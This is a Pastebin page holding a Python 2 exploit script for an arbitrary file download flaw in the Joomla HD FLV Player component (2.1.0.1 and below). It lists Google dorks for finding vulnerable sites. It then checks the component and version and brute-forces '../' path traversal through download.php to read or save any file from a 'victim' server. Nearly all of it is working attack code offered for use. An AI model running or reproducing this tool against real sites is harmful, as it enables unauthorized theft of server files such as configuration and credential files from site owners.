API tools faq
paste
amiralbenz

2.0.1

amiralbenz
Jul 11th, 2015
332
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.74 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2. #
  3. # Exploit Title : Joomla HD FLV 2.1.0.1 and below Arbitrary File Download Vulnerability
  4. #
  5. # Exploit Author : amiral benz
  6. # Dork google 1: inurl:/component/hdflvplayer/
  7. # Dork google 2: inurl:com_hdflvplayer
  8. # Info:
  9. # Url: http://target/components/com_hdflvplayer/hdflvplayer/download.php?f=
  10. # Http connection
  11. import urllib, urllib2
  12. # String manipulation
  13. import re
  14. # Time management
  15. import time
  16. # Args management
  17. import optparse
  18. # Error management
  19. import sys
  20.  
  21. banner = """
  22. _______ __ ___ ___ ______
  23. | _ .-----.-----.--------| .---.-. | Y | _ \\
  24. |___| | _ | _ | | | _ | |. 1 |. | \\
  25. |. | |_____|_____|__|__|__|__|___._| |. _ |. | \\
  26. |: 1 | |: | |: 1 /
  27. |::.. . | |::.|:. |::.. . /
  28. `-------' `--- ---`------'
  29. _______ ___ ___ ___ _______ __
  30. | _ | | | Y | | _ | .---.-.--.--.-----.----.
  31. |. 1___|. | |. | | |. 1 | | _ | | | -__| _|
  32. |. __) |. |___|. | | |. ____|__|___._|___ |_____|__|
  33. |: | |: 1 |: 1 | |: | |_____|
  34. |::.| |::.. . |\:.. ./ |::.|
  35. `---' `-------' `---' `---'
  36.  
  37. <= 2.1.0.1
  38.  
  39. Written by:
  40.  
  41. amiral benz
  42. """
  43.  
  44. # Check url
  45. def checkurl(url):
  46. if url[:8] != "https://" and url[:7] != "http://":
  47. print('[X] You must insert http:// or https:// procotol')
  48. sys.exit(1)
  49. else:
  50. return url
  51.  
  52.  
  53. def checkcomponent(url,headers):
  54.  
  55. try:
  56. req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php', None, headers)
  57. sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")
  58. print("")
  59. except urllib2.HTTPError:
  60. sys.stdout.write("\r[+] Searching HD FLV Extension...: Not FOUND :(")
  61. sys.exit(1)
  62. except urllib2.URLError:
  63. print '[X] Connection Error'
  64.  
  65. def checkversion(url,headers):
  66.  
  67. try:
  68. req = urllib2.Request(url+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers)
  69. response = urllib2.urlopen(req).readlines()
  70.  
  71. for line_version in response:
  72.  
  73. if not line_version.find("<version>") == -1:
  74.  
  75. VER = re.compile('>(.*?)<').search(line_version).group(1)
  76.  
  77. sys.stdout.write("\r[+] Checking Version: "+str(VER))
  78. print("")
  79.  
  80. except urllib2.HTTPError:
  81. sys.stdout.write("\r[+] Checking Version: Unknown")
  82.  
  83. except urllib2.URLError:
  84. print("\n[X] Connection Error")
  85. sys.exit(1)
  86.  
  87. def connection(url,headers,pathtrav):
  88.  
  89. char = "../"
  90. bar = "#"
  91. s = ""
  92. barcount = ""
  93.  
  94. for a in range(1,20):
  95.  
  96. s += char
  97. barcount += bar
  98. sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)
  99. sys.stdout.flush()
  100.  
  101. try:
  102. req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php?f='+s+pathtrav, None, headers)
  103. response = urllib2.urlopen(req)
  104.  
  105. content = response.read()
  106.  
  107. if content != "" and not "failed to open stream" in content:
  108. print("\n[!] VULNERABLE")
  109. print("[*] 3v1l Url: "+url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav)
  110. print("")
  111. print("[+] Do you want [D]ownload or [R]ead the file?")
  112. print("[+]")
  113. sys.stdout.write("\r[+] Please respond with 'D' or 'R': ")
  114.  
  115. download = set(['d'])
  116. read = set(['r'])
  117.  
  118. while True:
  119. choice = raw_input().lower()
  120. if choice in download:
  121. filedown = pathtrav.split('/')[-1]
  122. urllib.urlretrieve (url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav, filedown)
  123. print("[!] DOWNLOADED!")
  124. print("[!] Check file: "+filedown)
  125. return True
  126. elif choice in read:
  127. print("")
  128. print content
  129. return True
  130. else:
  131. sys.stdout.write("\r[X] Please respond with 'D' or 'R': ")
  132.  
  133. except urllib2.HTTPError:
  134. #print '[X] HTTP Error'
  135. pass
  136. except urllib2.URLError:
  137. print '\n[X] Connection Error'
  138.  
  139. time.sleep(1)
  140. print("\n[X] File not found or fixed component :(")
  141.  
  142. commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME')
  143. commandList.add_option('-t', '--target', action="store",
  144. help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
  145. )
  146. commandList.add_option('-f', '--file', action="store",
  147. help="Insert file to check",
  148. )
  149. options, remainder = commandList.parse_args()
  150.  
  151. # Check args
  152. if not options.target or not options.file:
  153. print(banner)
  154. commandList.print_help()
  155. sys.exit(1)
  156.  
  157. print(banner)
  158.  
  159. url = checkurl(options.target)
  160. pathtrav = options.file
  161.  
  162. headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
  163.  
  164. sys.stdout.write("\r[+] Searching HD FLV Extension...: ")
  165. checkcomponent(url,headers)
  166. sys.stdout.write("\r[+] Checking Version: ")
  167. checkversion(url,headers)
  168. sys.stdout.write("\r[+] Exploiting...please wait:")
  169. connection(url,headers,pathtrav)
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!